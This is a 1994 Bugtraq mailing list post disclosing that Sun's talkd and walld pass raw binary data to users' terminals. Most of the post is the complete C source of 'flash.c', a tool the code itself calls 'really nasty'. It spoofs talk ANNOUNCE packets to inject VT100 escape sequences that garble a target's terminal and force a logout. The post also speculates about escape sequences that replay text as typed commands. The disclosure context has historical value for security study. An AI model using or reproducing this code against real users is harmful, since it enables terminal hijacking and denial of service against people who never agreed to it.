Bugtraq mailing list archives
Wall and talkd pass binary data
From: rjq () phys ksu edu (Rob Quinn)
Date: Tue, 19 Jul 1994 18:06:45 -0500 (CDT)
talkd and walld both pass binary data (on Sun's at least). Here's some source code I got from a friend. I informed Sun about the wall problem several months ago. This source just sends a string to mess up your fonts and such, but I've heard that some terminals have escape sequences that will buffer strings and re-issue them as if the user had typed them (I know there's an expression or term for that, but I can't think of it). I searced for this sequence for xterm, but didn't find one. I didn't look at any other terminal types. The date of this mail/source was June 9, so it's been out a while.
/* flash.c */ /* This little program is intended to quickly mess up a user's terminal by issuing a talk request to that person and sending vt100 escape characters that force the user to logout or kill his/her xterm in order to regain a sane view of the text. It the user's message mode is set to off (mesg n) he/she will be unharmed. This program is really nasty :-) Usage: flash user@host try compiling with: gcc -o flash flash.c */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #include <strings.h> /* this should really be in an include file.. */ #define OLD_NAME_SIZE 9 #define NAME_SIZE 12 #define TTY_SIZE 16 typedef struct { char type; char l_name[OLD_NAME_SIZE]; char r_name[OLD_NAME_SIZE]; char filler; u_long id_num; u_long pid; char r_tty[TTY_SIZE]; struct sockaddr_in addr; struct sockaddr_in ctl_addr; } OLD_MSG; typedef struct { u_char vers; char type; u_short filler; u_long id_num; struct sockaddr_in addr; struct sockaddr_in ctl_addr; long pid; char l_name[NAME_SIZE]; char r_name[NAME_SIZE]; char r_tty[TTY_SIZE]; } CTL_MSG; #define TALK_VERSION 1 /* protocol version */ /* Types */ #define LEAVE_INVITE 0 #define LOOK_UP 1 #define DELETE 2 #define ANNOUNCE 3 int current = 1; /* current id.. this to avoid duplications */ struct sockaddr_in *getinaddr(char *hostname, u_short port) { static struct sockaddr addr; struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)&addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); /* fill in the easy fields */ address->sin_family = AF_INET; address->sin_port = htons(port); /* first, check if the address is an ip address */ address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { /* it wasn't.. so we try it as a long host name */ host = gethostbyname(hostname); if (host) { /* wow. It's a host name.. set the fields */ /* ?? address->sin_family = host->h_addrtype; */ bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { /* oops.. can't find it.. */ puts("Couldn't find address"); exit(-1); return (struct sockaddr_in *)0; } } /* all done. */ return (struct sockaddr_in *)address; } SendTalkPacket(struct sockaddr_in *target, char *p, int psize) { int s; struct sockaddr sample; /* not used.. only to get the size */ s = socket(AF_INET, SOCK_DGRAM, 0); sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); } new_ANNOUNCE(char *hostname, char *remote, char *local) { CTL_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.vers = TALK_VERSION; packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); } old_ANNOUNCE(char *hostname, char *remote, char *local) { OLD_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); } main(int argc, char *argv[]) { char *hostname, *username; int pid; if ( (pid = fork()) == -1) { perror("fork()"); exit(-1); } if ( !pid ) { exit(0); } if (argc < 2) { puts("Usage: <finger info> "); exit(5); } username = argv[1]; if ( (hostname = (char *)strchr(username, '@')) == NULL ) { puts("Invalid name. "); exit(-1); } *hostname = '\0'; hostname++; if (*username == '~') username++; #define FIRST "\033c\033(0\033#8" #define SECOND "\033[1;3r\033[J" #define THIRD "\033[5m\033[?5h" new_ANNOUNCE(hostname, username, FIRST); old_ANNOUNCE(hostname, username, FIRST); current++; new_ANNOUNCE(hostname, username, SECOND); new_ANNOUNCE(hostname, username, SECOND); current++; new_ANNOUNCE(hostname, username, THIRD); old_ANNOUNCE(hostname, username, THIRD); }
-- | | | Rob Quinn | | rjq () phys ksu edu | | QuinnBob@KSUVM.BITNET |
Current thread:
- Re: Wall and talkd pass binary data Bob Page (Jul 19)
- Re: Wall and talkd pass binary data Craig Presson (Jul 20)
- <Possible follow-ups>
- Wall and talkd pass binary data Rob Quinn (Jul 19)
- Flash/talkd Patrick Mcdowell (Jul 20)
- Re: Flash/talkd Eric Wedaa (Jul 20)
- Re: Wall and talkd pass binary data a.e.mossberg (Jul 20)
- Flash/talkd Patrick Mcdowell (Jul 20)
- Re: Wall and talkd pass binary data Martin Sean Bennet - Sun UK - CSG Engineer (Jul 20)
- Re: Sending escape sequences to xterms via wall/talk Mike Raffety (Jul 20)
- Re: Sending escape sequences to xterms via wall/talk Christopher A. Stewart (Jul 20)
- Re: Sending escape sequences to xterms via wall/talk Andrew Beckett (Jul 21)
- setuid root programs and core dumps Rob Quinn (Jul 21)
- Re: Sending escape sequences to xterms via wall/talk Paul Daw (Jul 21)
- Re: Sending escape sequences to xterms via wall/talk Evil Pete (Jul 21)
- Re: Sending escape sequences to xterms via wall/talk Mike Raffety (Jul 20)